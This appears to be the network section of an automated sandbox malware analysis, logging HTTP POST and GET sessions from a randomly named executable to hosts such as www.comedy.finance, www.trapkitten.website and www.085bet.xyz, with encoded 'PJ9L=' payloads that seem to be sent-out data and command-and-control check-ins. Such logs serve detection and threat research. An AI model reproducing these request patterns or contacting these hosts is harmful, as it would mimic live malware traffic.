                                                                                Data Raw: 50 4a 39 4c 3d 2b 75 6c 73 76 6b 44 79 51 46 37 65 4f 74 37 6f 71 66 78 54 31 35 35 53 57 42 57 75 57 32 76 35 4e 78 59 45 71 4a 39 70 48 66 68 79 43 70 68 4f 54 43 79 7a 68 66 46 76 56 6a 79 5a 31 31 4b 53 31 66 46 77 49 41 56 6a 31 35 42 4b 7a 35 59 4b 6e 54 39 6d 31 78 31 6c 53 6a 51 70 72 55 56 61 39 70 43 58 63 5a 2f 6a 63 67 53 77 45 43 48 51 6a 74 69 30 4b 32 78 4c 48 37 43 41 46 77 73 47 39 48 76 65 6e 47 30 36 42 55 53 6d 2b 62 74 36 38 62 69 51 71 35 42 51 42 44 69 54 44 78 79 48 43 46 45 4c 43 79 39 2b 52 47 48 32 4d 6b 39 6c 4d 49 42 7a 2b 63 65 43 4a 46 4f 6f 35 5a 6a 73 51 4d 70 7a 44 71 59 3d
                                                                                Data Ascii: PJ9L=+ulsvkDyQF7eOt7oqfxT155SWBWuW2v5NxYEqJ9pHfhyCphOTCyzhfFvVjyZ11KS1fFwIAVj15BKz5YKnT9m1x1lSjQprUVa9pCXcZ/jcgSwECHQjti0K2xLH7CAFwsG9HvenG06BUSm+bt68biQq5BQBDiTDxyHCFELCy9+RGH2Mk9lMIBz+ceCJFOo5ZjsQMpzDqY=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.54998513.248.169.4880760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:39:30.669511080 CEST627OUTPOST /mwd0/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.comedy.finance
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.comedy.finance
                                                                                Referer: http://www.comedy.finance/mwd0/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Data Raw: 50 4a 39 4c 3d 2b 75 6c 73 76 6b 44 79 51 46 37 65 66 38 4c 6f 70 38 70 54 79 5a 35 52 54 42 57 75 66 57 76 39 4e 78 63 45 71 49 70 35 41 74 46 79 44 4e 74 4f 55 44 79 7a 69 66 46 76 64 44 79 63 71 46 4b 6a 31 66 4a 57 49 42 70 6a 31 2f 74 4b 7a 34 6f 4b 6b 67 46 6c 31 68 31 6a 64 44 51 72 30 45 56 61 39 70 43 58 63 59 50 64 63 67 4b 77 45 7a 33 51 6c 4d 69 33 45 57 78 45 47 37 43 41 53 67 74 75 39 48 75 37 6e 48 35 6e 42 57 61 6d 2b 65 42 36 37 4f 65 54 7a 70 42 57 46 44 6a 65 43 6b 54 77 43 30 77 69 43 43 49 6f 57 55 62 77 4a 53 51 50 57 71 4a 62 74 38 79 36 5a 57 47 66 6f 70 43 46 4b 76 35 44 64 39 50 34 79 66 37 76 45 34 70 42 6e 33 4b 77 53 6e 50 4e 30 56 34 7a
                                                                                Data Ascii: PJ9L=+ulsvkDyQF7ef8Lop8pTyZ5RTBWufWv9NxcEqIp5AtFyDNtOUDyzifFvdDycqFKj1fJWIBpj1/tKz4oKkgFl1h1jdDQr0EVa9pCXcYPdcgKwEz3QlMi3EWxEG7CASgtu9Hu7nH5nBWam+eB67OeTzpBWFDjeCkTwC0wiCCIoWUbwJSQPWqJbt8y6ZWGfopCFKv5Dd9P4yf7vE4pBn3KwSnPN0V4z


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.54998613.248.169.4880760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:39:33.210835934 CEST1644OUTPOST /mwd0/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.comedy.finance
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.comedy.finance
                                                                                Referer: http://www.comedy.finance/mwd0/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Data Raw: 50 4a 39 4c 3d 2b 75 6c 73 76 6b 44 79 51 46 37 65 66 38 4c 6f 70 38 70 54 79 5a 35 52 54 42 57 75 66 57 76 39 4e 78 63 45 71 49 70 35 41 74 4e 79 44 34 78 4f 55 67 61 7a 6a 66 46 76 63 44 79 64 71 46 4b 45 31 63 35 53 49 42 6c 5a 31 36 78 4b 79 65 55 4b 73 78 46 6c 67 52 31 6a 66 44 51 6f 72 55 56 50 39 70 79 54 63 5a 7a 64 63 67 4b 77 45 77 76 51 79 4e 69 33 4a 32 78 4c 48 37 43 79 46 77 73 44 39 48 32 4e 6e 48 73 51 41 6c 69 6d 35 36 68 36 2b 34 4b 54 73 35 42 55 43 44 69 4e 43 6b 58 76 43 30 63 41 43 43 4d 52 57 57 62 77 49 30 64 37 52 59 56 54 33 71 53 38 65 55 4f 53 2b 4a 4b 57 45 6f 56 4d 51 66 61 57 31 38 69 64 47 4e 68 79 71 6a 62 38 4d 7a 44 45 35 46 56 66 5a 7a 5a 66 61 57 36 55 45 75 34 74 45 4e 35 31 79 79 73 4f 6e 6c 55 79 69 50 59 64 34 4f 33 36 6f 46 4a 67 70 6e 6d 68 65 6f 57 70 72 68 4b 46 4f 2b 6f 79 57 36 41 51 69 6e 53 5a 52 33 76 6e 39 6b 33 32 79 4a 6a 35 54 48 61 6e 66 54 45 76 4d 32 4b 77 43 6a 6b 62 31 50 30 6f 2b 34 6c 63 4d 44 75 41 4f 74 78 62 4f 43 71 56 56 42 37 72 5a [TRUNCATED]
                                                                                Data Ascii: PJ9L=+ulsvkDyQF7ef8Lop8pTyZ5RTBWufWv9NxcEqIp5AtNyD4xOUgazjfFvcDydqFKE1c5SIBlZ16xKyeUKsxFlgR1jfDQorUVP9pyTcZzdcgKwEwvQyNi3J2xLH7CyFwsD9H2NnHsQAlim56h6+4KTs5BUCDiNCkXvC0cACCMRWWbwI0d7RYVT3qS8eUOS+JKWEoVMQfaW18idGNhyqjb8MzDE5FVfZzZfaW6UEu4tEN51yysOnlUyiPYd4O36oFJgpnmheoWprhKFO+oyW6AQinSZR3vn9k32yJj5THanfTEvM2KwCjkb1P0o+4lcMDuAOtxbOCqVVB7rZQKSqoFjSwUupXoKesFUE+XbGxtBTjo6WMeFcjdwU9FH9JlyyRH1ypPka2YjSOT5ajLYpIEm42wCStwbL+rqT1dSznOwqVPZYmxPnLxRdHlgnlutl+ociZm+pTWvu7OI3y4N6lf/6xLSEdXLuKvJ5UsXbVM2Xl0X1iQGEzxo0Hvcm4k0WSWf2kJDWEneHvOofBZcnk5gluHCP5MrbMdAnvMHCo6a7SxCJ6Z8eC3HkgSOUPhnqgQPRD5ON/qirh0NfS0ISs328vmGstTMWq2FL48j6AGhKEaYUZH+EVRlLlWPut1nsfmlgzfnFCe8McRHIBPXA6QcDxKENjZ1Bg4pgEXakoDCNbv5vJ9Ped2IGh5ZoqErau8kHnYIWWz/k+z/SEqL1NCNfvoR7MoftGScPUwUMpI7WQkwEuSNG+VndEAzgZRlbH+xC4a31VeksTncmU4WDrAx4axvFkmuhn4ZRj2lYiWd7lmjLnyYd/hsN9Irjn5ZSuFho0dILfyWVJktv0KbdLlCYyGj/pqaDU03Bv8YwI7QWQHOIXR0j/evI36WrqtX89wnqDF02+gk79olewu5z2t3DPa9poxJhatcuEaCLQRdtNYXuCx8DRDivXJ1W6qrxJCZaZZpfpp32jMJoCfFBXSQyisl+2fB3rUAJtUtHreKKi1svci [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.54998813.248.169.4880760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:39:35.764204025 CEST342OUTGET /mwd0/?PJ9L=zsNMsRGwEFvVUID2nvwzyJklFTuhYiH3MBMxsvplKOF6Mot/KgyF89prR2KXiWv2/O5FSCYG4KxKtJQmoSRR8B5YKwFVkQBt4uWwdNPaISGNJHiwitW0fGlJLbvQSjZk/A==&2z=PtRhXbM HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.comedy.finance
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Oct 10, 2024 14:39:36.222476006 CEST403INHTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Thu, 10 Oct 2024 12:39:36 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 263
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 50 4a 39 4c 3d 7a 73 4e 4d 73 52 47 77 45 46 76 56 55 49 44 32 6e 76 77 7a 79 4a 6b 6c 46 54 75 68 59 69 48 33 4d 42 4d 78 73 76 70 6c 4b 4f 46 36 4d 6f 74 2f 4b 67 79 46 38 39 70 72 52 32 4b 58 69 57 76 32 2f 4f 35 46 53 43 59 47 34 4b 78 4b 74 4a 51 6d 6f 53 52 52 38 42 35 59 4b 77 46 56 6b 51 42 74 34 75 57 77 64 4e 50 61 49 53 47 4e 4a 48 69 77 69 74 57 30 66 47 6c 4a 4c 62 76 51 53 6a 5a 6b 2f 41 3d 3d 26 32 7a 3d 50 74 52 68 58 62 4d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?PJ9L=zsNMsRGwEFvVUID2nvwzyJklFTuhYiH3MBMxsvplKOF6Mot/KgyF89prR2KXiWv2/O5FSCYG4KxKtJQmoSRR8B5YKwFVkQBt4uWwdNPaISGNJHiwitW0fGlJLbvQSjZk/A==&2z=PtRhXbM"}</script></head></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.2.549989195.161.68.880760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:39:41.718698025 CEST619OUTPOST /ucuo/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.trapkitten.website
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.trapkitten.website
                                                                                Referer: http://www.trapkitten.website/ucuo/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Data Raw: 50 4a 39 4c 3d 49 30 4b 39 6b 64 51 52 65 65 53 30 4c 39 67 59 41 49 5a 52 66 6b 48 4a 2b 6e 47 5a 45 6c 2f 7a 71 61 7a 36 44 62 64 36 49 57 4b 4d 69 46 75 48 78 51 36 52 69 4e 51 74 52 6e 4f 6e 73 69 4c 32 53 59 45 33 57 55 70 33 6d 42 37 4c 70 4d 63 4a 55 59 51 64 61 4f 6b 4f 30 31 79 66 64 56 46 78 55 66 46 73 51 38 42 72 6b 39 7a 31 7a 4b 2f 6d 77 31 6f 6d 46 6b 31 57 73 68 61 75 2b 4f 4a 52 5a 35 41 43 43 6f 30 41 55 63 71 74 6a 62 37 57 48 4f 31 54 64 33 65 61 57 42 42 6c 5a 69 4d 77 47 78 57 36 50 33 47 51 2f 4d 4a 4f 2f 41 6d 59 4d 46 4b 4f 4c 52 6c 62 71 62 62 4a 38 75 57 43 50 7a 78 42 74 48 38 3d
                                                                                Data Ascii: PJ9L=I0K9kdQReeS0L9gYAIZRfkHJ+nGZEl/zqaz6Dbd6IWKMiFuHxQ6RiNQtRnOnsiL2SYE3WUp3mB7LpMcJUYQdaOkO01yfdVFxUfFsQ8Brk9z1zK/mw1omFk1Wshau+OJRZ5ACCo0AUcqtjb7WHO1Td3eaWBBlZiMwGxW6P3GQ/MJO/AmYMFKOLRlbqbbJ8uWCPzxBtH8=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                14192.168.2.549990195.161.68.880760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:39:44.266417980 CEST639OUTPOST /ucuo/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.trapkitten.website
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.trapkitten.website
                                                                                Referer: http://www.trapkitten.website/ucuo/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Data Raw: 50 4a 39 4c 3d 49 30 4b 39 6b 64 51 52 65 65 53 30 4b 65 34 59 4d 4a 5a 52 4f 30 48 4b 79 48 47 5a 4b 46 2b 62 71 61 2f 36 44 61 70 71 4a 6c 75 4d 69 67 4b 48 77 53 43 52 6c 4e 51 74 4a 33 4f 69 69 43 4b 36 53 59 41 2f 57 51 70 33 6d 42 2f 4c 70 4f 45 4a 56 72 34 65 62 65 6b 41 34 56 79 64 5a 56 46 78 55 66 46 73 51 38 55 41 6b 39 37 31 30 36 50 6d 79 58 4d 70 47 6b 31 52 72 68 61 75 36 4f 4a 64 5a 35 41 30 43 70 6f 36 55 5a 32 74 6a 61 4c 57 47 63 4d 46 54 33 65 63 53 42 42 37 64 42 68 30 4c 67 65 62 53 52 7a 34 6f 2f 56 6c 36 32 4c 79 57 6e 43 6d 59 78 4a 6a 36 49 54 2b 74 65 33 72 56 51 68 78 7a 51 71 41 4c 63 32 46 78 79 2b 70 6d 6f 4d 30 65 4b 6f 41 77 6c 49 2b
                                                                                Data Ascii: PJ9L=I0K9kdQReeS0Ke4YMJZRO0HKyHGZKF+bqa/6DapqJluMigKHwSCRlNQtJ3OiiCK6SYA/WQp3mB/LpOEJVr4ebekA4VydZVFxUfFsQ8UAk97106PmyXMpGk1Rrhau6OJdZ5A0Cpo6UZ2tjaLWGcMFT3ecSBB7dBh0LgebSRz4o/Vl62LyWnCmYxJj6IT+te3rVQhxzQqALc2Fxy+pmoM0eKoAwlI+


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.549991195.161.68.880760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:39:46.804101944 CEST1656OUTPOST /ucuo/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.trapkitten.website
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.trapkitten.website
                                                                                Referer: http://www.trapkitten.website/ucuo/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Data Raw: 50 4a 39 4c 3d 49 30 4b 39 6b 64 51 52 65 65 53 30 4b 65 34 59 4d 4a 5a 52 4f 30 48 4b 79 48 47 5a 4b 46 2b 62 71 61 2f 36 44 61 70 71 4a 6c 6d 4d 69 57 47 48 77 7a 43 52 6b 4e 51 74 46 58 4f 6a 69 43 4c 67 53 63 73 37 57 52 56 4a 6d 45 6a 4c 6f 72 51 4a 64 36 34 65 53 65 6b 41 6c 46 79 63 64 56 45 72 55 66 56 6f 51 38 45 41 6b 39 37 31 30 34 58 6d 31 46 6f 70 41 6b 31 57 73 68 62 76 2b 4f 49 43 5a 39 74 42 43 70 73 51 56 74 36 74 69 36 62 57 41 70 59 46 62 33 65 65 56 42 41 6f 64 42 74 37 4c 67 53 70 53 56 79 54 6f 2f 39 6c 34 48 36 33 4f 57 53 47 46 79 4a 35 79 6f 6a 70 35 4c 62 6e 4d 53 31 34 2b 68 65 63 4c 66 43 50 2b 58 69 4b 75 73 64 35 64 4d 6c 52 68 43 46 57 48 50 56 52 46 46 46 50 49 39 34 56 37 75 68 4c 57 7a 4e 2f 68 2b 52 59 6c 70 6c 32 31 4b 63 61 36 5a 6a 76 61 75 54 33 67 57 71 32 59 6a 63 76 75 68 36 73 62 49 57 52 30 2b 76 48 63 6e 75 5a 32 74 67 42 78 72 79 51 6f 33 58 46 6f 31 39 4a 58 65 46 35 61 72 69 4e 71 79 45 66 4b 51 6d 56 54 65 50 4a 77 79 58 34 6e 6c 54 50 71 76 67 65 64 [TRUNCATED]
                                                                                Data Ascii: PJ9L=I0K9kdQReeS0Ke4YMJZRO0HKyHGZKF+bqa/6DapqJlmMiWGHwzCRkNQtFXOjiCLgScs7WRVJmEjLorQJd64eSekAlFycdVErUfVoQ8EAk97104Xm1FopAk1Wshbv+OICZ9tBCpsQVt6ti6bWApYFb3eeVBAodBt7LgSpSVyTo/9l4H63OWSGFyJ5yojp5LbnMS14+hecLfCP+XiKusd5dMlRhCFWHPVRFFFPI94V7uhLWzN/h+RYlpl21Kca6ZjvauT3gWq2Yjcvuh6sbIWR0+vHcnuZ2tgBxryQo3XFo19JXeF5ariNqyEfKQmVTePJwyX4nlTPqvgedEDkAdJXON0qoiR9o8x2994jumr3k4NAAyVLey7s2cGxO3llAmZh0wO2fKyLb5lFVp9aXVikMf2hK2CD7SdsAxpxbJJ8S4Uh0ELSYNT2Eu8pTyDh3Z0IQGOy8tCBko1GVBqoplugOpQ8nhUB+b8IlwFHBSznfdlp1IBNJjPjlxrGHe9Ui43dWWGe0pXQBPH/7pyOUxhVyHY6lpoH3AkL6+rueQvPdgB+2WjpP9ALJnQF6M/R6XlD2SGwsadmTzZnNgpO5SxELOf3y8MgTrh6rf9YxZ1uMg2nrjAzOuBQSyTqnnFhLRygHVIv6rbAyfCn1y/2MYIWhSwnDhK2xMrh3duYoNrlT9bUfb0u00Db1x+i0AsD4+bCCGKBWul1gRucVqeOhLNJ2GSwkB5FKY4GHpW/Dyf8qoC64yV+4MgHqa+zSpaJY2+ks6lvJQmT/FWnH3Q8dd9t7wx8R/tt6A3S1fEhUkZiqa5i5waaPgJ1If2SCvV8rR0t9TLOD4Xebm28piDeluE51GQWiXl/1z+qraUQLR0m6no4DwbiAYgFTYLFHs9FwCpgz6LlW2/UiyRoETjSmWtpVag4mJTn4CLJFWd8BGZ2koZvWP4M1tc+vMCDaEKmgPdS8Jt358UYU7c+7VYTNx3VYjzByHvJS1gln62VN0gz1qdg/zn [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                16192.168.2.549992195.161.68.880760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:39:49.350431919 CEST346OUTGET /ucuo/?PJ9L=F2idnr0OHvaqOr51MpBBHVyFl1qtLQKAl/KaTPRWCGeZjFeJnhqhzch+KjyhoQK5CvQXQgMRpx/N5s0yRowiXacxk2STcCVUR6hfHsh5g/iR2diS6k4PTHt/uTzg7spZGA==&2z=PtRhXbM HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.trapkitten.website
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                17192.168.2.54999345.194.36.1280760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:40:24.809365988 CEST595OUTPOST /nn3h/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.085bet.xyz
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.085bet.xyz
                                                                                Referer: http://www.085bet.xyz/nn3h/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Data Raw: 50 4a 39 4c 3d 35 56 58 58 6f 43 50 6d 6c 7a 47 53 38 41 39 44 46 36 57 39 57 58 78 6a 4d 71 61 77 30 6c 58 73 55 33 57 34 77 71 69 47 7a 42 58 61 43 7a 73 6a 6d 55 78 34 75 47 71 68 46 37 62 69 52 43 36 2b 30 32 56 39 4b 76 4d 67 72 37 56 38 7a 47 61 53 46 74 72 73 65 67 62 75 46 7a 39 62 30 30 62 64 77 4a 34 77 45 58 53 39 48 68 48 6d 51 68 6c 37 41 51 34 39 63 6d 55 39 45 4b 66 30 6b 7a 42 33 6d 43 4f 76 2f 38 4e 70 75 55 4b 58 49 57 48 54 78 30 35 6c 77 63 52 31 6a 6e 33 79 45 39 34 65 4d 6b 31 52 6b 79 4d 54 6a 4e 4b 39 65 4c 62 55 30 56 2b 6c 59 76 48 4f 38 5a 6f 74 54 42 45 7a 64 79 6f 32 46 51 30 3d
                                                                                Data Ascii: PJ9L=5VXXoCPmlzGS8A9DF6W9WXxjMqaw0lXsU3W4wqiGzBXaCzsjmUx4uGqhF7biRC6+02V9KvMgr7V8zGaSFtrsegbuFz9b00bdwJ4wEXS9HhHmQhl7AQ49cmU9EKf0kzB3mCOv/8NpuUKXIWHTx05lwcR1jn3yE94eMk1RkyMTjNK9eLbU0V+lYvHO8ZotTBEzdyo2FQ0=
                                                                                Oct 10, 2024 14:40:25.713057995 CEST327INHTTP/1.1 405 Method Not Allowed
                                                                                Content-Type: text/html
                                                                                Date: Thu, 10 Oct 2024 12:40:25 GMT
                                                                                Server: openresty
                                                                                X-Cache: BYPASS
                                                                                Content-Length: 154
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                18192.168.2.54999445.194.36.1280760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:40:27.352418900 CEST615OUTPOST /nn3h/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.085bet.xyz
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.085bet.xyz
                                                                                Referer: http://www.085bet.xyz/nn3h/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Data Raw: 50 4a 39 4c 3d 35 56 58 58 6f 43 50 6d 6c 7a 47 53 39 68 4e 44 44 64 43 39 51 33 78 67 41 4b 61 77 36 46 58 67 55 33 61 34 77 72 6e 4c 7a 7a 6a 61 43 53 63 6a 6f 31 78 34 74 47 71 68 50 62 61 6d 4d 53 36 31 30 32 70 44 4b 71 30 67 72 37 52 38 7a 48 4b 53 47 63 71 36 65 77 62 73 5a 7a 39 5a 35 55 62 64 77 4a 34 77 45 58 75 48 48 68 66 6d 51 51 56 37 42 30 6b 2b 51 47 55 2b 44 4b 66 30 79 44 42 7a 6d 43 4f 4e 2f 35 55 68 75 57 79 58 49 53 50 54 32 6c 35 36 6e 73 51 77 73 48 32 64 4d 74 64 38 4a 45 30 63 69 79 52 54 6a 37 65 50 62 39 32 2b 75 33 32 4e 4c 50 72 32 73 4b 67 61 43 78 6c 61 48 52 34 47 62 48 69 54 59 53 56 46 7a 68 33 69 4f 7a 49 31 54 6f 71 67 5a 31 59 4d
                                                                                Data Ascii: PJ9L=5VXXoCPmlzGS9hNDDdC9Q3xgAKaw6FXgU3a4wrnLzzjaCScjo1x4tGqhPbamMS6102pDKq0gr7R8zHKSGcq6ewbsZz9Z5UbdwJ4wEXuHHhfmQQV7B0k+QGU+DKf0yDBzmCON/5UhuWyXISPT2l56nsQwsH2dMtd8JE0ciyRTj7ePb92+u32NLPr2sKgaCxlaHR4GbHiTYSVFzh3iOzI1ToqgZ1YM
                                                                                Oct 10, 2024 14:40:28.250217915 CEST327INHTTP/1.1 405 Method Not Allowed
                                                                                Content-Type: text/html
                                                                                Date: Thu, 10 Oct 2024 12:40:28 GMT
                                                                                Server: openresty
                                                                                X-Cache: BYPASS
                                                                                Content-Length: 154
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                19192.168.2.54999545.194.36.1280760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:40:29.903953075 CEST1632OUTPOST /nn3h/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.085bet.xyz
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.085bet.xyz
                                                                                Referer: http://www.085bet.xyz/nn3h/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
